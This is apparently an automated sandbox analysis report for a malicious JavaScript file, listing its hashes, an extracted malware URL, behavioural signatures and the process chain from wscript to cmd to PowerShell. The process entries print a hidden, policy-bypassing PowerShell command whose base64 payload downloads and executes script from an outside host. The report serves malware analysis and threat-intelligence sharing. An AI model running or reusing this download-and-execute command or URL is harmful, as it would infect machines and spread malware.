Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
122s -
max time network
123s -
platform
windows7_x64 -
resource
win7-20231215-en -
resource tags
arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system -
submitted
30/12/2023, 23:19
Static task
static1
Behavioral task
behavioral1
Sample
1fc9a978424cdfc24b6fa036664a96c4.js
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
1fc9a978424cdfc24b6fa036664a96c4.js
Resource
win10v2004-20231215-en
General
-
Target
1fc9a978424cdfc24b6fa036664a96c4.js
-
Size
92KB
-
MD5
1fc9a978424cdfc24b6fa036664a96c4
-
SHA1
edf04b645d45474b29d14ba57e875cd972249558
-
SHA256
8c726bdeedc05247e575e12b35a14a99c4120f0d76e0390552e02994e5bd4cdb
-
SHA512
3ee15170a00c15cee2ac970dae4ca09f56975120c12f5b04915e38c4b94c71d1bd837a8c72653481e367ba0d8ca240a34df0e27fde1883b7040b871a4a9f9057
-
SSDEEP
1536:59Ry98guHVBqqg2bcruayUHmLKeZaMU7GwbWBPwVGWl9SZ8kV8Gp/5bzIEN4t/oG:59Ry98guHVBqqg2bcruzUHmLKeMMU7GY
Malware Config
Extracted
http://smart-integrator.hr/pornhub.php
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 3 2680 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2680 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2680 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 2372 wrote to memory of 2676 2372 wscript.exe 24 PID 2372 wrote to memory of 2676 2372 wscript.exe 24 PID 2372 wrote to memory of 2676 2372 wscript.exe 24 PID 2676 wrote to memory of 2680 2676 cmd.exe 23 PID 2676 wrote to memory of 2680 2676 cmd.exe 23 PID 2676 wrote to memory of 2680 2676 cmd.exe 23
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\1fc9a978424cdfc24b6fa036664a96c4.js1⤵
- Suspicious use of WriteProcessMemory
PID:2372 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AcwBtAGEAcgB0AC0AaQBuAHQAZQBnAHIAYQB0AG8AcgAuAGgAcgAvAHAAbwByAG4AaAB1AGIALgBwAGgAcAAiACkA2⤵
- Suspicious use of WriteProcessMemory
PID:2676
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepoWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AcwBtAGEAcgB0AC0AaQBuAHQAZQBnAHIAYQB0AG8AcgAuAGgAcgAvAHAAbwByAG4AaAB1AGIALgBwAGgAcAAiACkA1⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2680